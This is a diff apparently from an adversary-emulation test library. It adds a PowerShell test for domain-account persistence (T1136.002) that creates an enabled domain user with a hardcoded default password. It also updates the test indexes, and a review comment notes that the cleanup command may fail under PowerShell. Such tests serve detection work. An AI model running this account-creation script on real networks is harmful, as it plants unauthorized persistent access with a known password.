diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 99e74211..587975b9 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -125,6 +125,7 @@ persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GU
persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
+persistence,T1136.002,Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
persistence,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index cc4d262a..036c16ce 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -348,6 +348,7 @@ persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GU
persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
+persistence,T1136.002,Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
persistence,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 1d2baaf6..a5b8b9cf 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -249,6 +249,7 @@
- [T1136.002 Domain Account](../../T1136.002/T1136.002.md)
- Atomic Test #1: Create a new Windows domain admin user [windows]
- Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
+ - Atomic Test #3: Create a new Domain Account using PowerShell [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.014 Emond](../../T1546.014/T1546.014.md)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index e790f09c..de725c5f 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -630,6 +630,7 @@
- [T1136.002 Domain Account](../../T1136.002/T1136.002.md)
- Atomic Test #1: Create a new Windows domain admin user [windows]
- Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
+ - Atomic Test #3: Create a new Domain Account using PowerShell [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1098.002 Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index e79f7cb0..acdfb3e2 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -11752,6 +11752,43 @@ persistence:
'
name: command_prompt
elevation_required: false
+ - name: Create a new Domain Account using PowerShell
+ auto_generated_guid: 5a3497a4-1568-4663-b12a-d4a5ed70c7d7
+ description: 'Creates a new Domain User using the credentials of the Current
+ User
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ username:
+ description: Name of the Account to be created
+ type: String
+ default: T1136.002_Admin
+ password:
+ description: Password of the Account to be created
+ type: String
+ default: T1136_pass123!
+ executor:
+ command: |
+ $SamAccountName = '#{username}'
+ $AccountPassword = ConvertTo-SecureString '#{password}' -AsPlainText -Force
+ Add-Type -AssemblyName System.DirectoryServices.AccountManagement
+ $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain)
+ $User = New-Object -TypeName System.DirectoryServices.AccountManagement.UserPrincipal -ArgumentList ($Context)
+ $User.SamAccountName = $SamAccountName
+ $TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword)
+ $User.SetPassword($TempCred.GetNetworkCredential().Password)
+ $User.Enabled = $True
+ $User.PasswordNotRequired = $False
+ $User.DisplayName = $SamAccountName
+ $User.Save()
+ $User
+ cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain
+
+'
+ name: powershell
+ elevation_required: false
T1078.002:
technique:
external_references:
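Review bot: The `cleanup_command` of the added test uses the cmd.exe idiom `>nul 2>&1`, but the test's executor is `powershell`. Windows PowerShell generally rejects `nul` as a redirection target with an Out-File device error, so the delete may never run, which would leave an enabled domain account with the published default password `T1136_pass123!` in the directory. A PowerShell-native form such as `net user "#{username}" /del /domain 2>&1 | Out-Null` avoids this. Separately, the `ConvertTo-SecureString` and `PSCredential` round trip in `command` only hands the same plaintext back to `SetPassword`, so it adds no protection and could be dropped or explained in a comment. Since index.yaml looks generated, the change presumably belongs in the technique's source test definition; the same cleanup line is repeated in the T1136.002.md hunk.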
diff --git a/atomics/T1136.002/T1136.002.md b/atomics/T1136.002/T1136.002.md
index c3029be0..cf70f9c5 100644
--- a/atomics/T1136.002/T1136.002.md
+++ b/atomics/T1136.002/T1136.002.md
@@ -10,6 +10,8 @@ Such accounts may be used to establish secondary credentialed access that do not
- [Atomic Test #2 - Create a new account similar to ANONYMOUS LOGON](#atomic-test-2---create-a-new-account-similar-to-anonymous-logon)
+- [Atomic Test #3 - Create a new Domain Account using PowerShell](#atomic-test-3---create-a-new-domain-account-using-powershell)
+
@@ -80,4 +82,50 @@ net user "#{username}" >nul 2>&1 /del /domain
+
+
+
+## Atomic Test #3 - Create a new Domain Account using PowerShell
+Creates a new Domain User using the credentials of the Current User
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Name of the Account to be created | String | T1136.002_Admin|
+| password | Password of the Account to be created | String | T1136_pass123!|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+$SamAccountName = '#{username}'
+$AccountPassword = ConvertTo-SecureString '#{password}' -AsPlainText -Force
+Add-Type -AssemblyName System.DirectoryServices.AccountManagement
+$Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain)
+$User = New-Object -TypeName System.DirectoryServices.AccountManagement.UserPrincipal -ArgumentList ($Context)
+$User.SamAccountName = $SamAccountName
+$TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword)
+$User.SetPassword($TempCred.GetNetworkCredential().Password)
+$User.Enabled = $True
+$User.PasswordNotRequired = $False
+$User.DisplayName = $SamAccountName
+$User.Save()
+$User
+```
+
+#### Cleanup Commands:
+```powershell
+net user "#{username}" >nul 2>&1 /del /domain
+```
+
+
+
+
+